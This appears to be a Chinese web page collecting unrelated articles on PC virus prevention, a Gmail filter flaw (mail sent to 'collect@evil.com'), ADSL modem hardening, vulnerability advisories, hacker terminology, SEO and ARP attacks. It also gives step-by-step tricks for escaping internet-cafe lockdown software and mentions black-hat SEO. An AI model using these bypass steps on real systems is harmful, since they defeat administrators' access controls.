电脑中病毒的原因很多,比如使用随意打开网友发来的文件,U盘没有专用性,浏览恶意网站等,而且我渐渐发现,现在国内病毒似乎都开始为木马服务,电脑今天中招了,明天你就不知道你丢的到底是银行帐号,QQ帐号还是其他的什么。
现在市面上有不少杀毒软件,但是真正全面通杀的是在少之又少,而且各个价格不菲,普通老百姓家庭用的电脑就是因为价格原因一直在“裸奔”
那么有没有办法让病毒远离你呢?我可以很负责的说:有!
下面我就来告诉大家电脑防毒的一些小诀窍。
绝杀1:你是不是经常发现有陌生的、熟悉的网友给你发文件过来?或者是给你发彩铃什么的、现在更先进了,直接伪装成游戏邀请,你要接受,那你惨了,电脑马上被占领是一定的了。那么我们该如何防止呢?很简单:一律拒绝!不管是什么文件,什么邀请,全部都问明白了再接,而且,就算是接也只限于熟悉的人,陌生人干脆拒绝,你别看他给你发的东西超级诱惑,诱惑的背后可就是陷阱哦!
绝杀2:U盘传播可是一个重要的病毒传播途径,尤其是公用U盘,与其叫它U盘还不如叫毒包!可是U盘里的重要文件你又不得不看,这可怎么办?没关系!稍微修改一下组策略,你就可以把主动权掌握在自己的手里。
对于很多朋友来说,修改组策略可能是一件很难的事,其实没什么难的,跟我按照以下步骤去做,就OK。
第一步、点击“开始”选择“运行”,键入“gpedit.msc”,并运行,打开“组策略”窗口;
第二步、在左栏的“本地计算机策略”下,打开“计算机配置_管理模板_系统”,然后在右栏的“设置”标题下,双击“关闭自动播放”;
第三步、选择“设置”选项卡,勾取“已启用”复选钮,然后在“关闭自动播放”框中选择“所有驱动器”,单击“确定”按钮,退出“组策略”窗口。
好啦,现在你已经关闭了自动播放,插上U盘,先杀毒,然后再打开,记得一定要杀毒后打开哦·
当然,这样的方式只能禁止U盘自动播放,而不能禁止CD,要是CD有毒,那我建议你扔了这破盘!我记得熊猫烧香肆虐的时候,我买了张XP的盗版盘,结果里面就带熊猫烧香!
绝杀3、使用防毒功能更强的FireFox
说到这个很多人都认为我在做广告,其实不然,我做过一个实验,我自己写了一个小的自动运行程序,这个程序可以修改注册表,以达到修改主页的目的,然后我给这个程序做了免杀,用最新版本的杀毒软件都没有杀出来,用普通IE一打开带有程序的网页,我的注册表马上被修改,可是当我用FireFox的时候,忽然发现居然没有运行,而且居然有提示!这让我实在欣慰
你可以想象一下,现在大多数病毒都是从恶意网站带来的,你要是用电子银行,Q,甚至玩游戏,那你的帐号····
所以我强力推荐使用FireFox!
这样的几招,我虽然不敢保证你的电脑就没有病毒侵扰了,但是依然可以防止80%的病毒,你要是有任何你觉得机密的密码,文件等,我建议你一定按照我上面说的几个办法去做,加上在网上所获得的一些免费杀毒软件的帮助,我想,你绝对可以让你的电脑成为健康的工具的!
后门轻易开 Google修正Gmail邮件漏洞
这项技术来源自GNU组织的研究员Petko D. Petkov,他在自己的BLOG上发布了一条文章,介绍如何运用简单的方法引诱用户通过一个特制的网站登陆Gmail。据他介绍,他使用了多重表格-数据传输机制,只要写一个简单过滤器就能实现把所有电子邮件连同附件送交给collect@evil.com。
虽然Petkov并没有提供证明他的想法可行的证据,但是ODay Blog上却有人认同他的想法,并说明这是一个特别讨厌的bug,虽然这一过程未被用户证实,但是如果是真的,用户很难察觉自己的邮件被偷走。用户根本不会清楚自己被加入了过滤器,除非他们查看Gmail设置中的过滤器选项。
万幸的是据今天Google方面表示,该漏洞已经被修正,现在正在完成除虫报告。
推荐:不让自己的秘密流在别人的电脑中
Cookie是Web服务器发送到电脑里的数据文件,它记录了诸如用户名、口令等重要信息,甚至包括你的银行帐户信息!
如果要查看Cookies,必须要访问C分区。可是网吧的管理软件一般禁止访问该分区,例如现在流行的管理软件美萍、万象、还原精灵等,虽然它们各有不同,但大体的工作原理却很相似:用虚拟的桌面环境取代Windows桌面,通过设置禁止各种Windows系统的基本操作,迫使用户只能在软件的限制下活动。解除网管的关键就是如何访问到本地硬盘,一旦进入了本地硬盘,删除cookie以及后面要讲的其它个人信息就不在话下了。
呵呵,不要着急,请用鼠标跟着来。
第一招:随便打开一个网页,然后点击IE浏览器菜单中的“文件”→“另存为”,然后在弹出的窗口中选中任意一个文件夹,接下来按Shift+F10键调出鼠标右键,选择其中的“资源管理器”或“我的电脑”便可以打开选中的文件夹。
第二招:如果你运气不那么好的话,“资源管理器”和“My Documents”等窗口都被禁止了,第一招便无效。不过,网吧绝对不会没有QQ程序的,嘿嘿,打开自己的QQ,然后点击面板上的“TE浏览器”图标,启动TE浏览器,美萍所做的设置对IE管用,但是对TE却一点用都没有。你瞧是不是什么都出来了?
第三招:不会这么倒霉吧?对方将“Tencent EXPlorer”也加入到“管理”选项卡的“禁止”选项卡中啦?不要失望,请单击IE的收藏夹图标,浏览器出现了一个收藏夹项目区,选择其中任意一个项目,点击鼠标右键,选择“属性”,在“属性”对话框中地址栏项写的就是该收藏项目的URL,将之删除,改为“C:(或者其他你想访问的盘符)”,点击“确定”保存退出,重新回到浏览器窗口,再点击刚刚修改过的收藏夹,哈哈,进去了行了,现在打开c:\windows\cookies目录,就可以赫然看到自己曾经浏览过的一些网站消息,敢情还在呀。多留一天多一天患害!那就删呗!
QQ记录
在网吧上网,要重点保护的自然要算上QQ了,一些QQ盗窃程序都是冲着你在网吧中留下的QQ记录而去的。我们上网用户如果能在网吧上网后及时删除机器里记录有个人信息的文件,就可以避免大多数的攻击者,而不必担心被利用而破解出了密码。解决办法就是在离开网吧前,在QQ的快捷方式上单击鼠标右键,在弹出菜单里选择“属性”,在“目录”一栏中找到QQ所在目录的路径,进入,看到用你的号码命名的文件夹,然后干净地删除这个文件夹。
可是打住、打住,网管软件如果不允许你删除文件,也禁止了你的右键,又该如何应对呢?
别着急,请再跟着做。
第一步:打开微软拼音输入法(如没有用其它输入法也可)。
第二步:将光标插入会员卡号的文本输入框内,接着开始往里面输入任意一个拼音字母,然后就会出现拼音的状态条,在状态条上点击右键,或用键盘上的属性键,就会出现一个下拉菜单,选择其中的定义词组(放心,就算系统限制右键,在这也不管用)。
第三步:如果网管软件将右键锁住了,你则还需要将右键给调出来了,在网页中遇到禁用右键的情况我们会想出许多的办法来破解,其实这些方法中有的也能移动到操作系统中的。就介绍最常用的也最有效的一种方法吧:在需要操作的文件或快捷图标上先点住右键不放,再点下左键,然后松开左键,最后松开右键,这时熟悉的右键菜单便呈现在眼前了。另外还有一招更普通的,用鼠标左键单击选中要删除的文件,同时按住shift+F10键,即可在资源管理器中显示出鼠标的右键菜单。
第四步:右键出来后,可接着第二步来做,再选择文件菜单里面的“存为文本文件”保存
第五步:在弹出对话框后,随便选择一个文件夹,点击右键,选择资源管理器!
第六步:选择自己想要删除的文件夹和文件,一切OK。
以上删除方法百试百灵,网管软件没有防御的方法。
第七步:有些用户不想删除自己的记录,可以用Winzip把账号目录压缩为一个包文件,给包文件加上一串拗口的密码,再给它换一个别人意想不到的扩展名。在压缩时应将“执行”设为“移动文件”,并在“包含文件夹内容”和“保存其它层文件夹信息”选项前都打上钩。当压缩完成后,账号目录内已经空无一物,你再也不用担心秘密曝光了,除非别人知道压缩包的文件名称和密码。再把包文件放到硬盘上一个不引人注意的角落里或是软盘上。至于恢复,直接用Winzip解包到QQ的安装盘上就行了。也可以保护网吧里的QQ隐私。
ADSL Modem防攻击“修炼秘技”
我的ADSL“猫”受到了攻击,为此我让小猫好好地修炼了一番“内功”,安全“功力”大长。下面给大家介绍一下“修炼秘技”。
最近我的ADSL Modem经常出现问题,有时开机能够正常工作,但大部分时间连网页都打不开,过一会儿重启ADSL Modem又正常了。开始还以为是ISP出问题了,打电话询问,被告知局端一切正常,可能是我的ADSL Modem受到了来自因特网的攻击。趁着周末有时间,我让ADSL Modem好好地修炼了一番“内功”,安全“功力”大长。下面笔者就给大家介绍一下“修炼秘技”。
我被攻击了
1.天网防火墙不停报警
我的接入方式为PPPoE,ADSL Modem开启路由方式,使用内置拨号软件自动拨号;开启DHCP服务,内网的机器从DHCP服务器自动获取IP。ADSL Modem使用的IP为公网IP,系统安装有天网防火墙个人版。
近段时间来,经常在ADSL Modem刚开机时不能上网,好不烦人。开始还以为是域名服务器有问题,但换一个域名服务器还是同样的现象。出现故障时,连配置软件也不能连接到ADSL Modem,Ping ADSL Modem也没有反应。怀疑是ADSL Modem出了问题,赶紧借来一个换上,参数配置跟以前的那个一样。唉,还是同样的故障现象,看样子不是它的“错”了。不会是ISP出了问题吧,打电话去一问,说是我受到了攻击。
难怪这些天来,我发现每次一开机,天网防火墙就开始报警,某某IP在不停地扫描我的端口(图1),开始我没注意,但后来越来越频繁,几乎每秒钟都有来自外网的IP试图连接到我机器上的某个端口的报警,居然都被天网拒绝了,但是频繁报警始终让人烦啊。
图一
2.安全措施不够导致被攻击
后来多方查找资料得知,发生上述故障现象的主要原因是ADSL Modem通过路由方式拨号上网后,ADSL Modem获得了公网的合法IP地址,互联网上的任何人都可以通过该IP地址来访问我的ADSL Modem。这样一些网络恶意攻击者或病毒(如震荡波病毒)就可以有针对性地进行扫描、探测,然后进行攻击,耗尽ADSL Modem资源,从而导致ADSL Modem工作异常。
ADSL Modem厂商为了让用户在全速下达到最理想的使用效果,在设备中采用的是默认最低的安全级别,而用户在购买回来后又没有对安全性方面进行进一步的设置。还有就是用户网络安全意识不足,在配置路由共享方式时没有采取任何安全防范措施(如更改Root密码,更改或限制Web/Telnet的管理端口等),从而使ADSL Modem毫无保护的直接暴露在一些怀有恶意的攻击者面前。
在这种情况下,如果ADSL Modem中某一个开放的端口存在漏洞且被不法攻击者发现,极有可能被利用来进行远程攻击。假如攻击者取得了ADSL Modem的管理员密码,他就可以远程登录到ADSL Modem上,通过NAT表得知内网机器的IP地址,把这个内网机器映射到因特网上,再使用其他的攻击工具给我种植一个“后门”,那我岂不是惨了。而且攻击者在获得管理员的权限后还可以把一个坏的固件程序刷写到ADSL Modem的Flash中,这样我的ADSL Modem岂不彻底报废了。呜呜,不敢想像。
注意:一般采用PPPoE /PPPoA /1483 固定IP+NAT /1577 +NAT方式接入的用户都有可能受到攻击。采用路由共享方式下的用户更容易受到攻击。
秘技一:“加固”ADSL Modem
1.更改Root用户的密码
ADSL Modem出厂时都设置了默认的登录用户名和密码。一般同一型号产品的默认用户名与密码是相同的。我们大多数人在安装好ADSL Modem后从未对默认的用户名与密码进行修改,这就留下了很大的安全隐患。修改默认Root用户名和密码的方法是:在浏览器地址栏中键入ADSL Modem的地址(一般为192.168.1.1),输入正确的用户名与密码,进入ADSL Modem的配置页面后,点击“管理”标签,在“用户设置”处点击Root用户旁的修改符号(如图2),然后再键入原来的密码和新密码,点击“提交”按钮更改设置。当然,首先必须将用于配置的电脑网卡IP地址改为与ADSL Modem的地址位于同一网段。
图二
笔者发现,有些型号的ADSL Modem,在正确更改完用户名和密码后,重新又恢复成默认的密码了,如果是这种情况,我们可用Telnet登录ADSL Modem,然后在$提示符下用Passwd命令修改Root用户的口令,再用commit命令提交你的更改。用这种方法也能够成功地修改用户名和密码。
2.更改Web/Telnet管理端口
设置了复杂的密码后也并不能完全保证ADSL Modem不受攻击。一般的ADSL Modem都可通过Web/Telnet方式来进行本地或远程管理,许多恶意的攻击者都是指定这几个默认的端口,通过扫描工具对某个IP地址段进行扫描再确定攻击目标。而我们的ADSL Modem开放的80、21和23等端口则是首当其冲的扫描重点。通过修改服务端口,可以避开大部分的扫描工具的试探。进入ADSL Modem的配置页面,点击“管理”标签,在“端口设置”中更改HTTP、Telnet和FTP端口。如我们把HTTP端口修改为8080,Telnet端口修改为8023(图3),以后通过Web方式访问时要用http://192.168.1.1:8080,而通过Telnet方式访问时要用Telnet 192.168.1.1:8023的方法。
图三
3.映射不存在的端口
开启路由功能的ADSL Modem都是通过NAT映射方式来实现的,NAT映射可以把来自因特网上对ADSL Modem某个端口的连接转移到内网中某个IP地址指定的端口上。病毒或恶意攻击者一般都是针对ADSL Modem的几个典型端口(如135、139、445、3127等)进行攻击,我们可以尝试把这些端口的攻击全部转移到内网中一个实际不存在的IP上,从而减少因要处理大量连接而给ADSL Modem带来的负担。在一般的ADSL Modem中,我们可以通过RDR规则和BIMAP规则来把端口映射到不存在的IP上。
1)使用RDR规则映射
如何使用RDR将Web/Telnet/FTP/TFTP等端口映射到一个不存在的IP上呢?进入ADSL Modem的配置页面,点击“服务”标签,在“NAT设置”中选择“NAT Rule Entry”,然后点击“添加”按钮,添加RDR规则。以Web端口为例,我们把它映射到一个不存在的IP:192.168.1.100上(图4),选择Rule Flavor为RDR,填入Rule ID,在本地IP地址的开始和结束分别填入192.168.1.100,在目标端口的起始值/终止值和本地端口中分别选择HTTP(80),其他的选项都选择默认值即可。Telnet/FTP/TFTP端口可参照此设置。
图四
2)使用BIMAP规则映射
使用BIMAP透明规则做所有的端口映射,将它们映射到一个不存在的IP。进入ADSL Modem的配置页面后,点击“服务”标签,在“NAT设置”中选择“NAT Rule Entry”,然后点击“添加”按钮,添加BIMAP规则。例如,我们把BIAMP规则映射到一个不存在的IP:192.168.1.200上。选择Rule Flavor为BIAMP,填入Rule ID,在本地IP地址的开始和结束分别填入192.168.1.200即可。
通过这样的设置,针对ADSL Modem的一般服务端口(或所有端口)进行的攻击,就被全部转移到内网中一个实际不存在的IP地址192.168.100(或200)上了。
4.升级固件
因为有些ADSL Modem在市场上投入的时间较早,原来采用的软件版本较低,在安全方面有一定的缺陷。现在有很多厂商在各自的主页上都有最新的固件程序提供下载,针对此类问题进行了修改,我们可通过升级ADSL Modem的固件来解决。具体的方法在厂商官方网站上都有介绍,笔者这里就不再详述了。
秘技二:开启防火墙功能
以上的操作都要更改ADSL Modem的设置,有时可能会对当前的设置产生一定的影响,而且对许多不熟悉NAT设置的用户来说,在操作方面可能存在一定的难度。
下面笔者给大家介绍一种方法,无须更改ADSL Modem原有的设置就可防止再受到攻击。现在的ADSL Modem都带有防火墙功能,但默认的状态一般是关闭的,我们只要开启了防火墙功能就行了。一般防火墙功能是通过IP过滤来实现的,具体怎样建立IP过滤规则的,鉴于篇幅比较长,这里不详细讲述,只给大家介绍两种简单的方法。如果大家的ADSL Modem是采用的Globespan技术方案,请继续往下看。
1.使用防火墙补丁
在TP-Link网站上有一个关于TD-8800 ADSL Modem的防火墙补丁下载,笔者发现TD-8800是采用Globespan技术方案,这个补丁完全可以使用在Globespan芯片的ADSL Modem上。笔者在自己的ADSL Modem上试过,一切正常(当然是非TP-Link的产品)。其实它就是在ADSL Modem的IP过滤设置中开启了几条过滤规则,免去了我们手工添加的麻烦。
补丁的使用非常简单,只要在地址栏中填入ADSL Modem的IP地址,输入用户名和密码,然后点击“执行”按钮就可以了(图5)。
图5
2.使用用户配置文件
实达的网站上有一个专门针对网络攻击的用户配置文件下载(下载地址为:http://www.star-net.com.cn/aspsky/up file/sf_20042249929.rar),也只开启ADSL Modem的IP过滤功能,这并不影响用户原有的配置。不过这个扩展名为.GLBEHR的用户配置文件要配合实达ADSL Modem的配置程序来使用。运行ADSL 配置程序,指定ADSL Modem的IP,点击“下一步”,选择“用配置文件配置”,然后再点击“下一步”,指定文件.GLBEHR文件的路径,点击“完成”即可。这样就完成了配置,开启了ADSL Modem的防火墙功能,我们可以登录到Web中看到如图6所示的页面。图中状态灯为绿色的表示规则生效。利用这些规则我们可以有效地禁止来自WAN口上的非法流量。
图6
总结
以上的两种方法都只是开启了ADSL Modem的IP过滤功能及对应的规则,不影响用户原有的配置,建议一般用户采用。而更改端口等设置对熟悉ADSL Modem配置的用户来说具有更大的灵活性。
如果我们的ADSL Modem在开机时就因为受到攻击而造成不能登录的话,则可先拔下WAN口上的电话线再开机,把ADSL Modem设置好后再插上,重新启动就行了。
eWire Payment Client paymentinfo任意命令漏洞
受影响系统:
eWire Payment Client 1.70
eWire Payment Client 1.60
描述:
eWire是在丹麦使用的电子支付系统。
eWire处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞控制服务器。
eWire中所使用的PHP脚本ewirepcfunctions.php在调用命令行可执行程序时没有过滤URL中的paymentinfo参数:
厂商补丁:
eWire
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ewire.dk/page.asp?keyword=forsidedk&language=da
RemoteDocs R-Viewer 远程代码执行信息泄露漏洞
受影响系统:
RemoteDocs R-Viewer 1.6.2836
不受影响系统:
RemoteDocs R-Viewer 1.6.3768
描述:
RemoteDocs R-Viewer是一款文档查看器。
RemoteDocs R-Viewer处理文件时存在漏洞,远程攻击者可能利用这些漏洞控制用户系统或收集敏感信息。
远程攻击者可以用特制的RDZ文件替换正常加密的RDZ文件,这样如果用户使用R-Viewe打开了该文件就可能在不知情的情况下执行任意指令;此外一些可预测的临时目录中包含有R-Viewer曾经打开文档的非加密拷贝,且没有定期清理目录中的内容,因此用户可以读取敏感信息。
厂商补丁:
RemoteDocs
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.remotedocs.com/index.asp
黑客红客蓝客飞客究竟是什么?
黑客最早源自英文hacker,早期在美国的电脑界是带有褒义的。但在媒体报导中,黑客一词往往指那些“软件骇客”(software cracker)。
【红客】 —— 一个让人肃然起敬的名字!
红客可以说是中国黑客起的名字。英文“honker”是红客的译音。
红客,是一群为捍卫中国的主权而战的黑客们!
他们的精神是令人敬佩的!
破解者 —— 喜欢探索软件程序!
破解者 —— Cracker
破解者,他们的目标是一些需要注册的软件。他们通常利用Debug,找出内存中的密码。
【蓝客】 —— 特别喜欢蓝色的黑客们!
蓝客,也属于黑客群。
蓝客,是指一些利用或发掘系统漏洞,D.o.S(Denial Of Service)系统,或者令个人操作系统(Windows)蓝屏。
“蓝客”一词由中国蓝客联盟在2001年9月提出。当初的蓝客联盟(中国蓝客联盟)是一个非商业性的民间网络技术机构,联盟进行有组织有计划的计算机与网络安全技术方面的研究、交流、整理与推广工作,提倡自由、开放、平等、互助的原则。同时还是一个民间的爱国团体,蓝盟的行动将时刻紧密结合时政,蓝盟的一切言论和行动都建立在爱国和维护中国尊严、主权与领土完整的基础上,蓝盟的声音和行动是中华民族气节的体现。中国蓝客联盟(LUC)简称蓝盟,组建于2001年10月1日。2002年4月,公安部门受外交部压力开始调查此次事件,蓝盟核心人员在当月受到公安机关的传讯、调查,计算机被收缴送往上级公安厅取证、调查。后联盟被告知必须无条件无限期关闭网站,并永久停止使用“蓝客联盟”名号。
2002年6月2日,蓝盟在IRC频道召开“中国蓝客联盟告别会”,与会几百位网友了解、见证了蓝盟的组建及被迫关闭的内幕。
中国蓝客联盟只有一个,那便是2001年10月至2002年6月间的 cnlanker.net,那是我们美好的回忆,那是曾经一起分享胜利的喜悦、共同度过那些灰暗的日子的唯一见证。可惜的是如今这个域名已不在国人手上。
从2002年6月开始,任何自称蓝客联盟或蓝盟的组织、网站均属于其他网友的自发的个人行为,与最初的蓝盟
毫无任何关系。
现在的 cnlanker.com 是最初组建蓝盟的一群人的回忆,蓝盟永远不会重建。
【飞客】 —— 电信网络的先行者!
飞客,经常利用程控交换机的漏洞,进入并研究电信网络。
虽然他们不出名,但对电信系统作出了很大的贡献!
但到了今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。对这些人的正确英文叫法是Cracker,有人翻译成“骇客”。
黑客和骇客根本的区别是:黑客们建设,而骇客们破坏。
黑客一词一般有以下四种意义:
一个对(某领域内的)编程语言有足够了解,可以不经长时间思考就能创造出有用的软件的人。
一个恶意(一般是非法地)试图破解或破坏某个程序、系统及网络安全的人。这个意义常常对那些符合条件(1)的黑客造成严重困扰,他们建议媒体将这群人称为“骇客”(cracker)。有时这群人也被叫做“黑帽黑客”。
一个试图破解某系统或网络以提醒该系统所有者的系统安全漏洞。这群人往往被称做“白帽黑客”或“匿名客”(sneaker)或红客。许多这样的人是电脑安全公司的雇员,并在完全合法的情况下攻击某系统。
一个通过知识或猜测而对某段程序做出(往往是好的)修改,并改变(或增强)该程序用途的人。
“脚本小孩”则指那些完全没有或仅有一点点骇客技巧,而只是按照指示或运行某种骇客程序来达到破解目的的人
【著名黑客】
Richard Stallman--传统型大黑客,Stallman在1971年受聘成为美国麻省理工学院人工智能实验室程序员。
Ken Thompson和Dennis Ritchie--贝尔实验室的电脑科学操作组程序员。两人在1969年发明了Unix操作系统。
John Draper(以咔嚓船长,Captain Crunch闻名)--发明了用一个塑料哨子打免费电话
Mark Abene(以Phiber Optik而闻名)--鼓舞了全美无数青少年“学习”美国内部电话系统是如何运作的
Robert Morris--康奈尔大学毕业生,在1988年不小心散布了第一只互联网蠕虫。
Kevin Mitnick--第一位被列入fbi通缉犯名单的骇客。
Kevin Poulsen--Poulsen于1990年成功地控制了所有进入洛杉矶地区KIIS-FM电台的电话线而赢得了该电台主办的有奖听众游戏。
Vladimir Levin--这位数学家领导了俄罗斯骇客组织诈骗花旗银行向其分发1000万美元。
Steve Wozniak--苹果电脑创办人之一。
Tsotumu Shimomura--于1994年攻破了当时最着名黑客Steve Wozniak的银行帐户。
Linus Torvalds--他于1991年开发了着名的Linux内核,当时他是芬兰赫尔辛基大学电脑系学生。
Johan Helsingius--黑尔森尤斯于1996年关闭自己的小商店后开发出了世界上最流行的,被称为“penet.fi"的匿名回函程序,他的麻烦从此开始接踵而至。其中最悲惨的就是sceintology教堂抱怨一个penet.fi用户在网上张贴教堂的秘密后芬兰警方在1995年对他进行了搜查,后来他封存了这个回函程序。
Tsutomu Shimomura--能记起他是因为抓了米特尼克。
Eric Raymond--Eric Raymond就一直活跃在计算机界,从事各种各样的计算机系统开发工作。同时,Eric Raymond更热衷于自由软件的开发与推广,并撰写文章、发表演说,积极推动自由软件运动的发展,为自由软件作出了巨大贡献。他写的《大教堂和市集》等文章,是自由软件界的经典美文,网景公司就是在这篇文章的
响下决定开放他们的源代码,使浏览器成为了自由软件大家族中的重要一员
SEO经常被忽略的六大重要细节
最近一段时间比较忙,自己的IDC站和资讯站基本完成80%,最近倒是帮人研究了不少词:火狐,小说,家具,私服,月饼,非主流……
感觉很多网友在SEO操作的时候,或者新站即将上线的时候。网站大体的方向,以及一些基本SEO的操作都明白,但是对于很多细节的把握上有所欠缺。这里主要说下SEO经常忽略的细节问题。
引用一句名言:细节决定成败。
在SEO方面虽然我不敢说细节绝对能决定成败,但是在某些程度上细节真的能起到四两拨千斤的作用。
第一,选择与关键字含义相近的域名。
搜索引擎,至少百度是比较聪明的。域名中包含关键字可起到很好的相关性作用,绝对起到加分的作用。这点不用怀疑。
如果你是新站上线,那么建议你在选择好关键词后。注册一个与你关键字含义相近或者相同的域名。最常用的手段是用拼音。或者在你的域名中包含关键字拼音。在百度搜索"SEO"看一下。第一页上的站,基本域名中全部带有"seo"这个词。比如著名的小说网:http://www.xiaoshuo.com 直接就是小说的拼音。
第二,网站程序的选择
这一点同样比较重要,有一个好的网站程序你会事半功倍。
作SEO说到网站程序,估计多数人首先会想到zblog.上次渡虎谷大赛中它也算是被SEO了一把。确实这个程序不错,但是也确实这个程序现在用的实在是太泛滥了。而且不要忘了它是一个博客程序。robin也曾在文章中提到SEO怪现像之一就是随便建个博客就把自己当成是专业SEO.但是你在单独目录中加一个博客有时也不失为一个好办法。
我曾给一个私服站www.kkkwol.com建议在根目录下加一个zblog(发现这个行业多数是静态站)并经常更新,以带动收录和抓取以及网站首页的更新,现有这个站的排名在百度/GG/yahoo都不错。虽然排名上去与zblog没有绝对关系,但是初期预想的效果,它都起到了预想的效果。
点石论坛:http://www.dunsh.org所用的DZ论坛程序也是个非常好的系统,高手修改一些相关设置,可以作成大站。博客作SEO最大的硬伤在于他缺少交互性,只能由博主发贴,看客只能作回复。再一个,博客也难以作成一个大站。我在这里只是建议大家如果要想长久的作站,最好选择一套CMS系统。用CMS作站的最大好处是一般好的CMS内部优化作的不错,特别是目录结构很适合蜘蛛的抓取。功能只要有tag,可自定义目录,每页可定义关键字与描述等基本功能就可以,kingcms我个人用的比较多。当然还有dedecms这个是PHP有的时候比较麻烦一些。
第三,网站空间的选择
这一点,可能在意的人不多。而且现在卖空间的太多。据我了解,现在买空间的站长多数还是图个便宜。这里我举一个实例:用万网的空间,比用一些垃圾IDC的空间要好的多。收录快。而且稳定。这是因为百度对万网IDC站的IP段信任度比较高。这一点新手听起来可能有点悬,但是买空间多的老手肯定有感觉。很多垃圾IDC卖空间。一台服务器上可能存在上百个网站,这个可以用工具查的出来。如果上面都是些乱七八糟的站。一但这台服务器上同时超过三到五个站被K.那么你的站很有可能受到牵连,我以前也说过:百度有连坐效应,比较狠。如果你有条件,最好是租用一台独立服务器,上面只放自己的网站,但是这样花费高一些。
第四,链接质量问题
作站长的,特别是喜欢SEO的。肯定每天都要交换几个友情链接。这是很正常的。现在作链接多数都是要求对方与自己的网站有一定相关性再换。这是个好习惯。但不是唯一标准。换链接的时候不要在在乎PR值,它对排名起不到什么作用,而且刷上去的爆多。没有相关性,但是对方站在引擎中有某个热门关键字排名很好建议交换。收录时间不长,页数不多,链接JS调用,但是世界排名很高的,没有必要换。最后,外部链接一定要经常维护,看一下链接站有没有删你的链接,看一下对方站是否正常。一般每周检查一次。
第五,多利用长尾词
很多新手刚接触SEO或者是一些老手操作SEO的时候,经常把目标一下子定的过高,导致搞的自己很累且排名效果不好。举个例子,前几天有人跟我说,他想把小说这个词用三个月的时间冲到百度第二页上去。我帮他看了一下说:这个目标不好实现。首先,这个词太热门,每天八九万的检索量,现有排名都已经是比较专业的站了,而且百度自己还为这个词竞价了(这点比较讽刺)。你完全可以看一下百度下面的相关搜索,找一个相关的长尾词竞争不很激烈的来作。后来朋友选了"言情小说"这个词。现在不到一月已经在第二页,当然用了一些黑帽手段,这里就不说地址了。
说到长尾,还有一个朋友要作"传奇世界私服" http://www.99wol.com,很长时间以来不见效果,一个月前开始大量作尾词,比如:今天新开,最新,新开之类的。带动起主词来,传奇世界私服也开始在第二到第三页上浮动。这种词比较擦边不多作介绍。还有跑跑卡丁车(据说很多站长喜欢玩)这个词,主词基本作上去的希望不大。但是,你完全可以去作"跑跑卡丁车下载","跑跑卡丁车视频"等几个词,多几个长尾词上去,对主词有很大帮助。
第六,关键字布局
不管你懂不懂,首先不要作关键字堆积。新站堆积多了,只有两个结果,一是被K二是很难收录。老站如果堆积那就是降权了。关键字的布局要讲究合理。特别是你的描述中的关键字布局,最好是包含在一句很顺利的话里面,而且出现不要超过三次为好。一般首页顶部会有导航栏目,这里可以围绕关键字写一下栏目名。有些栏目名,可直接写成长尾词,但是同样不要太过,不要每个栏目名都包括关键字,这不是好现象。还有就是都知道的了,在页面的顶部,可以相对密集一点出现关键字。中间少之。底部可适当稍多。但是还是一句话:一定要让关键字合理顺应的出现不要生硬的连接。关键字的密度控制在2-6比较好,个人感觉。
最后告诫一些新手:
新手一开始最好是作尾词,因为见效果快。自己的理论实践起来也很容易见效果。
不要去试图去作那些每天检索超过两万的词,除非你对自己超有信心。多作一些检索量在5000左右的比较适合。
多看一些精品的SEO方面经验的文章,另外,更重要的是: just do it!
还有:
不要为了SEO去作站。搜索引擎优化只是网站推广的一个手段,绝不是网站的全部。
不要为了GGAD或者某个联盟去作站,这样作没什么太大的前途。
不要以为SEO是什么神秘的事,它其实很简单。
作者:SEOTY
推荐:彻底摆脱ARP困扰的终极设备解决方案
ARP病毒导致的频繁掉线,业已成为网吧业主最头疼的问题,ARP也一跃成为网络圈里最耳熟能详的名词之一。一时间各网络厂商针对ARP病毒的解决方案纷纷出炉,民间高手也各显其能。
硬件路由厂商最先出招,提供的解决方案大致分为三类,一类是“ARP免疫型”,从NAT底层协议出发,使用特定的NAT转发机制,仅PC机端需要对路由器或软路由的LAN口MAC进行MAC-IP绑定,对付ARP病毒的方法简单说来就是“你说的我听不懂”。另一类是“双向绑定型”,路由器、PC机端,都需要把对方的MAC-IP进行双向绑定,简单说来就是“你说的我不听”。还有一类是“内网广播型”,在内网中发送比ARP攻击频率更高的正确ARP信息,简单说来就是“我声大所以听我的”。
软件厂商也不甘落后,相继推出了ARP保护神,ARP卫士,ARP嗅探器,ARP防火墙,彩影网盾等等纯软件的解决方案。
但是在网吧实际使用环境中,使用效果并不尽如人意。第二代ARP病毒可以随心所欲的更改PC机的ARP缓存,绑定也无效,现有解决方案的弊端不断暴露出来。硬件产品无法解决PC端的ARP病毒攻击问题,既无法阻止ARP发作,也无法定位攻击源。而软件产品由于缺乏对网络硬件以及网络底层协议的了解,完全是瞎猫在找死耗子。
难道对ARP病毒真的就束手无策了吗?不。巡路“免疫墙”是彻底摆脱ARP困扰的终极解决方案。
二、巡路的解决之道
首先澄清一点,ARP不是病毒,而是一种“协议性攻击行为”,只所以称之为病毒,是因为目前ARP攻击工具的传播方式与发作现象已经愈来愈接近病毒。ARP(地址解释协议)是网络通信协议中的不可缺少的关键协议,它是负责将IP地址转换为对应MAC地址的协议。ARP的存在给了好事者可趁之机,但如果缺少了ARP协议,网络设备之间将无法进行通讯,这是为什么对ARP投鼠忌器的主要原因。
ARP病毒可分为两种,一种是ARP欺骗,一种是ARP攻击。ARP欺骗最先是黑客们偷盗网络账号使用的,后来被广泛用于类似网路岗、网络执法官之类的网络管理工具,被骗主机会将数据发送给伪装的主机,从而达到截获数据的目的。而ARP攻击纯粹是以破坏网络通讯为主要目的,发送虚假的ARP请求包或应答包,使得网络内所有主机都失去了有序的组织和联系,所以ARP攻击成为网吧经营活动中相互打击一种重要方式。
ARP病毒的传播,必须有“肉鸡”,就是容易被感染的宿主机,通过得到宿主机的控制权来发送ARP欺骗、虚假的ARP请求包和应答包。由于没有明显的特征字以及ARP在网络通讯中的重要地位,防毒墙和防火墙应对ARP病毒也束手无策。所以从源头上堵住问题数据的流出,同时放行合法的ARP数据包,才是彻底摆脱ARP困扰的终极解决方案。
